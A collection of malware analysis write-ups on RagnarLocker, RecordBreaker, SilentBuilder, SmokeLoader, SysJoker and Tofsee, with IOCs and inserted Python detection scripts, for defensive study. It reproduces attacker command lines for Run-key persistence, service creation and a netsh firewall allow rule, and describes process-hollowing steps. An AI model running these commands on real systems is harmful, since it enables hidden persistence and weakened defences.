After identifying the disks to be encrypted, it enumerates services: we can see that it uses _EnumServiceStatusA_, with which it queries the service control manager database (previously opened with _OpenSCManagerA_) and compares each of the services with the internal list; if it finds something related to its exclusion list, it will close it using _CloseServiceHandle_.
![image](https://user-images.githubusercontent.com/91592110/139928691-6c4ee9ef-2ef1-4984-8d96-2fc38ec4d895.png)

List of excluded services:

```
vss
sql
memtas
mepocs
sophos
veeam
backup
pulseway
logme
logmein
connectwise
splashtop
kaseya
```

After that, it creates the usual ransom note in which it asks for money (usually cryptocurrencies) to ransom the encrypted files. As we can see, it first creates the file, obtaining from memory the name of the txt, and performs the first creation in _\Public\Documents_, a directory obtained through the _CSIDL_ identifier using _SHGetSpecialFolderPathW_. After creating it, it retrieves from memory both the predefined data the note contains and the hash it creates as our identifier, which will be used to contact the attackers, in this case using _qTox_.

![image](https://user-images.githubusercontent.com/91592110/139929143-3fbf3f58-6d6f-4c50-9792-0b8fe929cf16.png)

![image](https://user-images.githubusercontent.com/91592110/139929262-fc805c87-0d4f-43be-ab0f-151eeb950f7c.png)

![image](https://user-images.githubusercontent.com/91592110/139929384-5bc991ae-fe43-487c-917d-8ad61c0acd39.png)

Later, it tries to encrypt the files, avoiding some folders, files and extensions that it also checks in memory, so as not to touch what it does not need to encrypt or what could alert of its presence; it loops to check the files in each case.
![image](https://user-images.githubusercontent.com/91592110/139929648-c8bb803a-7bbc-483c-b65d-2410815bf0dd.png)
![image](https://user-images.githubusercontent.com/91592110/139929663-fc42bb04-a67a-43f6-8e67-05de7e463315.png)

![image](https://user-images.githubusercontent.com/91592110/139929675-b29517f8-a1df-4096-83a8-f6ad45208a99.png)

An example of what a short file looks like before and after being encrypted, in which we can see how it appends the keys and the RAGNAR tag at the end.

![image](https://user-images.githubusercontent.com/91592110/139929936-57087b2c-f250-438c-8039-22412f371d2d.png)

![image](https://user-images.githubusercontent.com/91592110/139929941-080fad57-ef6c-4195-a230-2d3a28a182df.png)

Finally, to display the txt in the default session in which RagnarLocker has worked, it uses the _Interactive window station_: we see how it gets the session identifier and the process that is running the ransomware, duplicates its token, gets the session, and so on, to spawn the file in the session so that, at the end of its operation, we know what the steps were and what has happened on each of the affected computers.
![image](https://user-images.githubusercontent.com/91592110/139930089-c224d2a2-3e72-487b-bf7f-5a2d4bddfea7.png)

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:

-------------------------------------------------------------------------------- /Ransomware/Readme: --------------------------------------------------------------------------------

-------------------------------------------------------------------------------- /RecordBreaker/RecordBreaker.md: --------------------------------------------------------------------------------

# _Overview

_RecordBreaker or RaccoonStealerV2 is the new version of the Raccoon stealer, which can be bought as malware-as-a-service on black markets for under $300. It is widely used in mass campaigns or by criminal groups that try to infect repositories or attach this malware, usually compressed in ZIP/RAR format. Its main objective is to reach the largest number of victims, and it contains different phases including process injection, binary downloading and information theft._

# _Technical Analysis

RecordBreaker usually appears in infected repositories or in attachments as a compressed file that, when opened, executes a binary which, depending on the version, makes outbound connections in different ways in order to geolocate, check for internet connection or download files. If this phase is fulfilled, it performs an injection into a legitimate binary, usually related to .NET such as RegAsm, InstallUtil or Regsvcs, from where it performs the information theft.
![image](https://user-images.githubusercontent.com/91592110/193622883-b7c05e8b-f640-40dd-aea7-253e3e333fb9.png)

An example of the execution flow is the following, in which after a zip a binary is executed that makes a request to a malicious IP and then launches an encoded sleep of 12 seconds before injecting RegAsm.exe.

![image](https://user-images.githubusercontent.com/91592110/193624249-b3b4d9a4-bf6d-4768-a1e6-729731d2ddf7.png)

In some versions it performs fake PNG/JPG downloads; if it fails to make the connection, the next phase is not performed.

![image](https://user-images.githubusercontent.com/91592110/193624765-df4165ac-a11f-40ed-8341-67557c14fc44.png)

RecordBreaker generates persistence by creating a task with a name similar to the structure of a CLSID.

![image](https://user-images.githubusercontent.com/91592110/193625182-99dbf25c-1837-4d64-b3e6-ff633c885e30.png)

Task name example:

```
\{0A2620E2-3469-4C1A-AD19-BD835A6FA571}
```

After this initial phase, it performs an injection, commonly using processes related to .NET: we can see how it creates the process suspended, then writes into it (WriteProcessMemory), modifies the thread context (SetThreadContext) and, when it has done all this, releases the thread it was writing to.

![image](https://user-images.githubusercontent.com/91592110/193626223-03d7dacf-e53e-457b-b320-38335471a8d3.png)

Processes considered for injection:

> - RegSvcs.exe
> - RegAsm.exe
> - AppLaunch.exe
> - InstallUtil.exe
> - aspnet_compiler.exe

Once injected into the legitimate process, RecordBreaker starts working. In the first phase it resolves imports, since by itself it only has the ability to load other APIs/libraries with _GetProcAddress_ + _LoadLibraryW_.
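The injection sequence and the CLSID-shaped task name described above are both easy to match mechanically. The script below is an added example (not the write-up's tooling): it flags a suspended CreateProcess followed, for the same target, by WriteProcessMemory, SetThreadContext and ResumeThread, and separately tests task names against the GUID pattern. The trace line format and the trace lines are constructed for the example.

```python
"""Flag the process-hollowing call order described above (process created
suspended -> WriteProcessMemory -> SetThreadContext -> thread resumed) in an
API trace, and the CLSID-looking scheduled-task names used for persistence.

Added example for this write-up, not the author's tooling. The trace line
format ("caller_pid api target_pid args") and the lines themselves are
constructed; adapt parse_line() to what your sandbox or EDR emits.
"""
import re

CREATE_SUSPENDED = 0x00000004

# Injection hosts listed in the write-up (compared case-insensitively)
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "applaunch.exe",
                "installutil.exe", "aspnet_compiler.exe"}

# Steps that must appear in this order for one (caller, target) pair after
# the suspended CreateProcess; unrelated calls in between are ignored
STEPS = ["WriteProcessMemory", "SetThreadContext", "ResumeThread"]

# \{8-4-4-4-12 hex}: a task whose whole name is a GUID
CLSID_TASK_RE = re.compile(
    r"^\\?\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


def parse_line(line):
    """Split 'caller api target args' into (int, str, int, str)."""
    caller, api, target, *rest = line.split(None, 3)
    return int(caller), api, int(target), rest[0] if rest else ""


def detect_hollowing(trace):
    """Return one finding per completed hollowing sequence."""
    pending = {}   # (caller, target) -> [next step index, image path]
    findings = []
    for line in trace:
        caller, api, target, args = parse_line(line)
        key = (caller, target)
        if api.startswith("CreateProcess"):
            image, flags = args.rsplit(None, 1)
            if int(flags, 16) & CREATE_SUSPENDED:
                pending[key] = [0, image]
            continue
        if key not in pending:
            continue
        step, image = pending[key]
        if api == "ResumeThread" and step < len(STEPS) - 1:
            # resumed before any write/context change: a benign suspended start
            del pending[key]
        elif api == STEPS[step]:
            pending[key][0] = step + 1
            if step + 1 == len(STEPS):
                name = image.rsplit("\\", 1)[-1].lower()
                findings.append({"caller": caller, "target": target,
                                 "image": image,
                                 "dotnet_host": name in DOTNET_HOSTS})
                del pending[key]
    return findings


def is_clsid_task_name(name):
    """True for task names that are just a GUID, like the example above."""
    return bool(CLSID_TASK_RE.match(name))


# Constructed trace: one hollowing of RegAsm.exe, one benign suspended start
SAMPLE_TRACE = [
    r"3000 CreateProcessW 4120 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 0x00000004",
    r"3000 NtQueryInformationProcess 4120 ProcessBasicInformation",
    r"3000 WriteProcessMemory 4120 0x00400000 len=512",
    r"3000 WriteProcessMemory 4120 0x00401000 len=65536",
    r"3000 SetThreadContext 4120 eax=0x00412345",
    r"3000 ResumeThread 4120 -",
    r"3100 CreateProcessW 5300 C:\Windows\System32\notepad.exe 0x00000004",
    r"3100 ResumeThread 5300 -",
    r"3200 CreateProcessW 5400 C:\Windows\System32\cmd.exe 0x00000000",
]

if __name__ == "__main__":
    for finding in detect_hollowing(SAMPLE_TRACE):
        print(finding)
    print(is_clsid_task_name(r"\{0A2620E2-3469-4C1A-AD19-BD835A6FA571}"))
```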
When it has all the new libraries and APIs loaded, we get a better understanding of the code, and the malware gets new capabilities.

![image](https://user-images.githubusercontent.com/91592110/193627753-deba8711-f8a2-4754-ba95-9474d86713c7.png)

We can see how it performs a reinfection control using a Mutex with a hardcoded string.

![image](https://user-images.githubusercontent.com/91592110/193628250-8c7c8255-f58d-431d-b12e-674a5dc34f0c.png)

And we can see how it obtains data that will be used later, encrypted with RC4.

![image](https://user-images.githubusercontent.com/91592110/193628432-b8b24203-0a2e-4c4f-a545-6c5b309d0613.png)

After a decryption phase, it collects data from the machine, user, search engines, etc., which it gathers on the basis of an internal configuration.

In this phase we can also see, depending on the version, how it performs download requests to malicious IPs to bring more functionality to the code.

![image](https://user-images.githubusercontent.com/91592110/193629025-5883e72f-9933-4eaf-94f8-bd3b2d3f2aa2.png)

To obtain the data, RecordBreaker uses SQLite to perform queries and obtain all the information it is interested in, and then saves it in files that it sends to the C&C.
![image](https://user-images.githubusercontent.com/91592110/193629354-02df0565-2a14-4855-90e2-3bd570b2bf9b.png)

The main information that RecordBreaker usually steals is:

> - Browser (Cookies, User info, Passwords)
> - Telegram info
> - Bank Information (Cards/Accounts)
> - CryptoWallets

All this information is sent to a C&C server and, since persistence has been established, it can keep adding to this information :)

# _IOC

### _SHA256

### _IP

### _Domains

```
http://rgyui[.]top
http://acacaca[.]org
```

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:
--------------------------------------------------------------------------------
/SilentBuilder/SilentBuilder.md:
--------------------------------------------------------------------------------
# _Overview

_SilentBuilder is a campaign used to launch bankers such as Emotet, both to grow the Epoch5 botnet and to carry out the usual tasks of this malware. Given the similarities with other loaders that launch Emotet and that, once the banker is on our computer, try to contact the C&C, we can understand this as the typical modus operandi of the criminal group Mummy Spider, or TA542._

# _How it Works

The attacker gains access to our system after a phishing email, more specifically SpearPhishing [T1566.002], since it carries an attachment such as an XLS or DOCX. Because the document contains macros or hidden functions, it downloads a file, usually a DLL; once downloaded, it is launched on the computer by abusing Regsvr32.exe, and it then works through a list of C&C servers.

![0](https://user-images.githubusercontent.com/91592110/165115747-2f771d13-1043-4af2-825c-a55c5ae62601.png)

# _Static Analysis

Once the document is downloaded we find, in my case, an XLS which, at a glance, contains interesting functions that will run automatically when it is opened.

![1](https://user-images.githubusercontent.com/91592110/165120891-d9d71949-a3a3-4926-be9b-9ca350d44b4e.png)

An interesting fact is that this sample shows the usual warning that will launch the functions and, in addition, another warning created by the attacker that is simply an image.

![2](https://user-images.githubusercontent.com/91592110/165121338-1c2a8930-f0f8-40e5-9826-813890d61234.png)

After this, we see a completely blank document, with no pages, no macros... Digging further, we see that it does have internal sheets with characteristic names, and that they were hidden.
![3](https://user-images.githubusercontent.com/91592110/165122164-89f7db54-ba5e-4d0a-94dc-810e1ebda71b.png)

Once again the sheets are empty... After reviewing the document and changing the colour of all the sheets, we find all the functions, obfuscated and disordered.

![4](https://user-images.githubusercontent.com/91592110/165122974-c0cdd14b-01ff-4923-9d28-78c60223957e.png)

In one of the sheets we find the most important function, which deobfuscates most of the functionality that the document's functions will have.

We obtain, as we can see, functionality for downloading a supposed library (nhth.dll) from different domains:

![5](https://user-images.githubusercontent.com/91592110/165123309-199782a9-80bb-4d94-90ef-eabc19f95af3.png)

# _Dynamic Analysis

_Once we have an idea of how the document is going to work internally, let's check whether we are right._

We see that once the Excel file is launched, it makes a request to a domain and downloads a file (we observe in the network traffic the MZ header typical of a Windows PE). After this, we can see that it downloads the DLL into \users\\< YourUser >\\ and then moves it to the path \AppData\Local\\< RandomName >\\ under another name, < RandomName >.adj

![image](https://user-images.githubusercontent.com/91592110/165127834-d79cec5f-9b27-482d-97d2-df88463f176a.png)

We can see that if we compare the file obtained from the network traffic with the one found in \users\ or in \AppData\ , it is the same file.

![image](https://user-images.githubusercontent.com/91592110/165128128-1d3fd203-18f4-407d-b00b-461d3a4a3512.png)

After this, we see that the DLL tries to contact a list of C&C servers.
![image](https://user-images.githubusercontent.com/91592110/165128479-8e606913-199b-41f1-adec-fc5831206764.png)

If we look at the origin of all the addresses it tries to contact, we can see that it has servers across most of America, Europe and Asia, among other regions.

![7](https://user-images.githubusercontent.com/91592110/165128942-55d00be4-4d06-4b20-84b3-41377f135589.png)

How long will they continue to exploit Emotet? Who knows...

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:
--------------------------------------------------------------------------------
/SmokeLoader/SmokeLoader.md:
--------------------------------------------------------------------------------
# _Overview

_SmokeLoader is a malware that generally acts as a backdoor and is commonly used as a loader for other malware. It is attributed to the criminal group Smoky Spider, which uses SmokeLoader and Sasfis as loader and downloader respectively. SmokeLoader has been used as a bot in infrastructures and contains strong evasion capabilities, as well as Anti-Analysis, Anti-VM and Anti-DBG techniques._

# _Technical Analysis

SmokeLoader usually arrives on systems through phishing, although it can also be loaded by other PUP/PUA or malware. The main execution revolves around a document that spawns SmokeLoader which, in most of its versions, runs a copy of itself in a suspended state in order to inject code; after that it executes an _explorer.exe_ into which it injects again, in order to perform the malicious C&C actions or download other files using legitimate software.

![image](https://user-images.githubusercontent.com/91592110/187239221-5968e49f-3684-4094-8de3-8ac597abaa7b.png)

The samples found have in most cases been detected as packed, due to the high entropy of their sections.

![image](https://user-images.githubusercontent.com/91592110/187241303-3a2dffb6-1847-44a0-9bd1-a31e73c1d1bb.png)

At the initial point, we see how it tries to load libraries at runtime, something really useful to it since it prevents us from discerning its intentions with a basic static analysis; it thus obtains new functionality during its execution.
![image](https://user-images.githubusercontent.com/91592110/187241924-4a02b64a-3d96-4eb3-a82d-d14aba87eecd.png)

Among the techniques used to hinder analysis, such as code obfuscation, we find different hidden calls, as well as abuse of RET to reach calls that we will not see statically.

![image](https://user-images.githubusercontent.com/91592110/187242148-842d7a21-3762-435d-9dd8-483f42b86854.png)

As mentioned above, it fetches libraries at runtime and is dedicated to resolving APIs that it may use later on.

![image](https://user-images.githubusercontent.com/91592110/187242691-ca58c58d-59ce-49bb-b3f4-9ea0698c57bc.png)

At all times it keeps control over what is running on the machine, since it subsequently performs various Anti-VM and Anti-DBG techniques, so having all running processes mapped is always a good technique.

![image](https://user-images.githubusercontent.com/91592110/187243583-2b3d9f16-1b2e-437c-a94d-91caed2f5f0c.png)

After this, it starts loading the APIs that will serve it moments later, in a routine that loads from memory using LoadLibrary + GetProcAddress.

![image](https://user-images.githubusercontent.com/91592110/187243708-dd1c7f62-6843-4936-927d-d8ba5a2e5034.png)

APIs:

```
CreateFileA
CreateWindowExA
CreateProcessA
WriteProcessMemory
ResumeThread
DefWindowProcA
NtWriteVirtualMemory
RegisterClassExA
GetStartupInfoA
SetThreadContext
GetCommandLineA
PostMessageA
VirtualAllocEx
CloseHandle
VirtualAlloc
VirtualFree
VirtualProtectEx
ExitProcess
GetMessageExtraInfo
WaitForSingleObject
NtUnmapViewOfSection
MessageBoxA
ReadProcessMemory
GetThreadContext
WriteFile
GetModuleFileNameA
GetFileAttributesA
WinExec
GetMessageA
```

Once it has the libraries, APIs and processes under control, it creates a process in a suspended state. For this it uses CreateProcessInternalA, which calls CreateProcessInternalW passing 0x04 in dwCreationFlags to create the process suspended.

![image](https://user-images.githubusercontent.com/91592110/187244113-325b1c03-7162-452c-9851-42abbfe8d174.png)

![image](https://user-images.githubusercontent.com/91592110/187244358-62cc2b27-184a-4ccd-aadf-4a239460eb55.png)

![image](https://user-images.githubusercontent.com/91592110/187244373-7c8eaa92-3f6e-4ec6-93df-9e95f94efc93.png)

Once the process is created in a suspended state, it proceeds to place the binary inside the previously spawned process: through Process Hollowing it unmaps the process's own data in order to write the binary inside, usually via ZwUnmapViewOfSection + VirtualAlloc + ZwWriteVirtualMemory. Once the binary is inside the memory of the suspended process, the process is resumed and executes it, so the in-memory file is detonated.
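The hollowing sequence just described (suspended CreateProcess*, unmap, allocate, write, SetThreadContext, ResumeThread against the same child), rendered as detection logic over an API-call trace. This is an added example, not code from the write-up; the `Call` record shape, the Nt/Zw alias sets and the pids in `SAMPLE_TRACE` are constructed for the demo.

```python
"""Detect the process-hollowing API sequence described above in an API-call
trace: CreateProcess* with CREATE_SUSPENDED, then NtUnmapViewOfSection,
VirtualAllocEx, WriteProcessMemory/NtWriteVirtualMemory, SetThreadContext and
ResumeThread against the same child. The Call record shape and the pids in
SAMPLE_TRACE are constructed for this demo, not taken from a real sandbox.
"""
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004  # the dwCreationFlags bit the write-up observes

# Ordered stages; each accepts the A/W and Nt/Zw spellings of the same API.
STAGES = [
    ("create_suspended", {"CreateProcessA", "CreateProcessW",
                          "CreateProcessInternalA", "CreateProcessInternalW"}),
    ("unmap", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("alloc", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write", {"WriteProcessMemory", "NtWriteVirtualMemory",
               "ZwWriteVirtualMemory"}),
    ("set_context", {"SetThreadContext", "NtSetContextThread"}),
    ("resume", {"ResumeThread", "NtResumeThread"}),
]
RESUME_APIS = STAGES[-1][1]


@dataclass
class Call:
    pid: int        # calling process
    api: str
    target: int     # pid the process/thread handle refers to
    flags: int = 0  # dwCreationFlags, only meaningful for CreateProcess*


@dataclass
class Track:
    stage: int = 1  # index of the next stage we expect
    seen: list = field(default_factory=list)


def detect_hollowing(trace):
    """Return [(caller_pid, target_pid, apis)] for each completed chain.

    A chain opens only on a CreateProcess* call with CREATE_SUSPENDED set and
    advances when the next expected stage is seen for the same (caller,
    target). Repeated calls of the current stage (e.g. one write per section)
    are tolerated; a ResumeThread before the chain completes discards it, so a
    plain suspend-then-resume launcher never fires.
    """
    tracks, findings = {}, []
    for c in trace:
        key = (c.pid, c.target)
        if c.api in STAGES[0][1]:
            if c.flags & CREATE_SUSPENDED:
                tracks[key] = Track(seen=[c.api])
            else:
                tracks.pop(key, None)
            continue
        t = tracks.get(key)
        if t is None:
            continue
        if c.api in STAGES[t.stage][1]:
            t.stage += 1
            t.seen.append(c.api)
            if t.stage == len(STAGES):
                findings.append((c.pid, c.target, tuple(t.seen)))
                del tracks[key]
        elif c.api in RESUME_APIS:
            del tracks[key]  # resumed early: not a hollowing chain


    return findings


# Constructed trace: pid 1000 hollows its child 1001 while a benign launcher
# (pid 2000) merely starts 2001 suspended and resumes it.
SAMPLE_TRACE = [
    Call(1000, "CreateProcessInternalW", 1001, flags=CREATE_SUSPENDED),
    Call(2000, "CreateProcessW", 2001, flags=CREATE_SUSPENDED),
    Call(1000, "NtUnmapViewOfSection", 1001),
    Call(1000, "VirtualAllocEx", 1001),
    Call(1000, "NtWriteVirtualMemory", 1001),
    Call(1000, "NtWriteVirtualMemory", 1001),  # headers first, then sections
    Call(2000, "ResumeThread", 2001),
    Call(1000, "SetThreadContext", 1001),
    Call(1000, "ResumeThread", 1001),
]

if __name__ == "__main__":
    for caller, target, apis in detect_hollowing(SAMPLE_TRACE):
        print(f"hollowing: pid {caller} -> pid {target}: {' > '.join(apis)}")
```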
![image](https://user-images.githubusercontent.com/91592110/187244878-b65d2548-6a5b-40c2-bfe1-962619351f4d.png)

[ The binary extracted from memory, which will inject explorer.exe, is very interesting; we will follow up on it soon :) :detective: ]

# _IOC

### _IP

```
216.128.137.31
8.209.71.53
```

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:
--------------------------------------------------------------------------------
/SysJoker/A new Backdoor: SysJoker.md:
--------------------------------------------------------------------------------
# _Overview

_SysJoker is a backdoor which appeared for the first time at the beginning of 2022, and whose power resides in being cross-platform.
Its main objective is to install itself on our computer and perform espionage and/or data theft tasks. Currently it has not been attributed to any group or campaign._

# _What we see at a glance

In this sample, written in C++, we will see several of the functionalities mentioned before.

SHA256:
```
1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
```

![exeinfo](https://user-images.githubusercontent.com/91592110/158830817-202c7da0-5bbe-463a-b3b8-de53991d2cb9.png)

We can see at a glance how a PowerShell is executed after the binary; it has different uses and is employed at different points.

![ps1](https://user-images.githubusercontent.com/91592110/158831357-e02fa45e-021e-4443-8de8-2a4f3ab1f556.png)

![ps2](https://user-images.githubusercontent.com/91592110/158831379-0b64a19d-52c7-4295-9247-653f430fae5a.png)

![ps3](https://user-images.githubusercontent.com/91592110/158831388-60d0d35c-fef3-48ea-8290-5d2fad118fd6.png)

# _Analysis

Looking at how it works from the beginning, SysJoker creates a folder, usually in ProgramData or in subfolders of AppData, in which it leaves a copy of itself named after legitimate software, in this case using igfx, whose legitimate variant is related to the _Intel Graphics Common User Interface_.

_Execution flow:_

```
.
├── (Parentprc) SysJoker.exe
| ├─ (Childprc) Powershell.exe
| ├─ (Childcmd) powershell.exe copy '' ''

```
![0](https://user-images.githubusercontent.com/91592110/158833215-43fe28c7-bc4b-4e18-9fed-9821493086e9.png)

After this, we see how the dropped file is executed from the previously mentioned folder, and how it obtains different important elements of the machine such as the MAC, OS and network. It saves them in different .txt files, located in the same path where the copy is running.
As we can see, it sometimes uses the built-in WMIC tool to get certain data and dump it.

_Commandlines:_

```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'

"C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber

"C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt

"C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
```

![1](https://user-images.githubusercontent.com/91592110/158833441-25716da1-ce42-48df-a8a8-7f06c6e994e8.png)

After the previous step, the files are deleted, since the information is hardcoded before being sent to a C&C server; this information is dumped into a supposed DLL which, as we can see, is simply encoded information.

![2](https://user-images.githubusercontent.com/91592110/158833531-ed22f635-7a93-4ba1-9406-68c69f103f6a.png)

![exeinfo2](https://user-images.githubusercontent.com/91592110/158833555-b4aac916-5406-4746-ae15-d68f32096295.png)

After this, it persists on the computer by adding the previously copied file to the registry key _CurrentVersion\Run_, with which it gets executed again, in a forced way (/F), every time we start the system.
_Commandline:_

```
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
```

![3](https://user-images.githubusercontent.com/91592110/158833676-78210d1a-bf1c-483d-91e5-9d3b9988bed7.png)

As for communications with the C&C, it has been seen to use different domains such as _drive.google.com_ or _github_, to make traffic detection and rule creation more difficult. In short, SysJoker does not bring anything particularly new, but it has a quite characteristic methodology that makes it quite recognisable.

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:
--------------------------------------------------------------------------------
/SysJoker/Readme:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Tofsee/Tofsee backdoor.md:
--------------------------------------------------------------------------------
# _Overview

_Tofsee is a malware used for mass campaigns, and it does not have an associated group or actor. It has gone through different phases, but has generally been used to build Botnets or SpamBots, as well as for mining. The starting point of Tofsee is usually a Loader or an email using the SpearPhishing technique that launches the malware.
It has been, in all its stages, a really well-worked malware, with code obfuscation, packed samples and anti-analysis techniques, leading to a backdoor that performs mining, taking advantage of the botnet features, or sends Spam._

# _Technical Analysis

After the loader or the phishing we would see Tofsee running on the computer; an overview of how the current versions of Tofsee work can be seen in the following schematic diagram.

![image](https://user-images.githubusercontent.com/91592110/183301004-460ecac2-de36-4c90-bbb2-3d665c0ef7fb.png)

The actual behaviour of the current versions has different variations, but in essence it works in a similar way. After Tofsee executes, a copy of itself is created in SysWow64 (or equivalent), which is then moved to temporary folders; usually the sample in the temporary folder and the one in SysWow will not have the same name. After this, it creates a service using sc.exe, usually with a name and/or description related to network elements. Later, it modifies the Firewall to add an svchost to a completely permissive rule; this svchost is the one into which it will have injected. After this, it can perform its tasks inside an svchost that would be difficult to pick out when observing processes, with permission to send and receive all types of traffic through the Firewall, and with a service that lets it launch the backdoor as if it were a system service.

```
.
├── (Parentprc) Tofsee.exe
| ├─ (Childprc) (Moved | Dropped) .exe
| ├─ (Childprc) Netsh/cmd/sc
| ├─ (Childprc) (Injected) Svchost
| ├─ (Net) C&C

```

A large number of samples have been reviewed to narrow down the current versions of Tofsee as much as possible; an example of what we would see when viewing one of them in PEstudio is as follows.

![image](https://user-images.githubusercontent.com/91592110/183301107-e6b9b874-27fc-411b-ad82-5e0c9733b75d.png)

At the first step, we see how it launches a copy of itself into SysWow64, which it then moves to a temporary folder. The commands used, launched by cmd.exe, are the following:

```
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\" C:\Windows\SysWOW64\
```
![image](https://user-images.githubusercontent.com/91592110/183301167-0903a506-59a7-4041-ba14-eb01d0254566.png)

Once it has two files in different locations, it uses one of them (the SysWow copy) to modify the defences, as well as to set up persistence via a service. For the service creation, we can see that it creates a service named "Wifi Support" with type= own and start= auto; as we noted before, it is usual for the name to be related to something network-related, trying to avoid being found.
The command used, launched by sc.exe, is as follows:

```
"C:\Windows\System32\sc.exe" create binPath= "C:\Windows\SysWOW64\\ /d\"C:\Users\\Desktop\"" type= own start= auto DisplayName= "wifi support"
```
![image](https://user-images.githubusercontent.com/91592110/183301204-2e5da69d-f222-4250-bc7d-05f83ef8ffb0.png)

Once it has created the service, it has ensured that the backdoor will remain on the computer, launched as just another service and going completely unnoticed, so it needs to modify the Firewall rules so that its communications to the outside do not run into problems. For this, it uses netsh.exe to create a rule that allows all traffic for an svchost process (the one that is injected).

The command used is:

```
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes
```

![image](https://user-images.githubusercontent.com/91592110/183301250-cc434e70-68f1-43dc-8a5e-ceda1fffb134.png)

![image](https://user-images.githubusercontent.com/91592110/183301252-ea93585f-2a51-470d-a9ce-0333cdbfb5e5.png)

In addition, we can see that it adds itself to the exclusions in a registry key, the path with the random name being the place where it previously dropped itself.

![image](https://user-images.githubusercontent.com/91592110/183301277-258e0f5c-1482-40a7-b250-570810ddf4e4.png)

![image](https://user-images.githubusercontent.com/91592110/183301279-22ef33e1-124b-4206-b19f-7cd6ef08f88b.png)

While all the above processes are being launched, the other binary, in a temporary path, is performing other actions, such as injecting an svchost, the same one we have seen being added to the exclusions and given a rule in the Firewall.
During a normal execution we would find an svchost without a parent process which, after looking at it in depth, turns out to be another of the binaries launched by Tofsee; we can locate it by its PID.

![image](https://user-images.githubusercontent.com/91592110/183301407-cf23b299-1b0c-4ff6-9cf9-5d2320efb97b.png)

This binary is the other binary that Tofsee worked with and had previously moved to %temp%.

![image](https://user-images.githubusercontent.com/91592110/183301423-29bbdd7f-d5ba-4712-8265-ca6ce4abf1ec.png)

Once in this phase, it has the Tofsee functionality inside a legitimate process, with persistence created and with fully open traffic through the Firewall, which it uses to connect to a C&C server.

The most common destinations in the campaigns of recent months are the following (Russian or Chinese IPs/domains are commonly used by Tofsee):

```
svartalfheim.top
lazystax.ru
```

![image](https://user-images.githubusercontent.com/91592110/183301459-911f0845-42e9-4bfa-9db7-ff8feb352951.png)

# _IOC

### _C&C

```
svartalfheim.top
lazystax.ru
```

> :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective:
--------------------------------------------------------------------------------
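The command lines quoted in the SilentBuilder, SysJoker and Tofsee write-ups above (regsvr32 loading a renamed .adj from AppData\Local, getmac/wmic output dumped to ProgramData, the forced Run-key entry, the move into SysWOW64, the sc.exe service and the netsh allow rule for a SysWOW64 svchost), turned into detection logic over process-creation events. This is an added example, not code from the write-ups; the event dict shape and the regsvr32 path in the sample events are assumptions constructed for the demo.

```python
"""Flag the process command lines described in the SilentBuilder, SysJoker
and Tofsee write-ups in a stream of process-creation events.

Sample events are constructed for this demo (most reuse command lines quoted
in the write-ups; the regsvr32 one is invented to match the described
AppData\\Local\\<RandomName>\\<RandomName>.adj path). The event dict shape is
an assumption, not any product's schema.
"""
import re

# Each rule: (name, [regexes that must ALL match the command line]).
RULES = [
    # SilentBuilder: regsvr32 loading a renamed payload (.adj) from AppData\Local
    ("regsvr32_nondll_appdata", [
        r"\bregsvr32(\.exe)?\b",
        r"\\AppData\\Local\\[^\\\s\"]+\\[^\\\s\"]+\.(?!dll\b)[a-z0-9]{2,4}\b",
    ]),
    # SysJoker: host fingerprinting (getmac / wmic) dumped to ProgramData\*.txt
    ("recon_to_programdata_txt", [
        r"\b(getmac|wmic\s+(path\s+win32_physicalmedia|OS\s+get|nicconfig))\b",
        r"(>|Out-File)[^;&]*C:\\ProgramData\\[^\s\"']+\.txt",
    ]),
    # SysJoker: forced (/F) Run-key persistence pointing into ProgramData
    ("runkey_to_programdata", [
        r"\breg(\.exe)?\s+add\b",
        r"\\CurrentVersion\\Run\b",
        r"/D\s+\"?C:\\ProgramData\\",
    ]),
    # Tofsee: payload moved from a Temp folder into SysWOW64 via cmd
    ("move_temp_to_syswow64", [
        r"\bmove\s+/Y\s+\"?[^\"]*\\Temp\\",
        r"C:\\Windows\\SysWOW64\\",
    ]),
    # Tofsee: auto-start service whose binary lives in SysWOW64
    ("sc_create_syswow64_binpath", [
        r"\bsc(\.exe)?\"?\s+create\b",
        r"binPath=\s*\"?C:\\Windows\\SysWOW64\\",
    ]),
    # Tofsee: inbound allow rule for an svchost outside System32
    ("netsh_allow_syswow64_svchost", [
        r"\bnetsh(\.exe)?\"?\s+advfirewall\s+firewall\s+add\s+rule\b",
        r"\baction=allow\b",
        r"program=\"?C:\\Windows\\SysWOW64\\svchost\.exe",
    ]),
]


def classify(cmdline):
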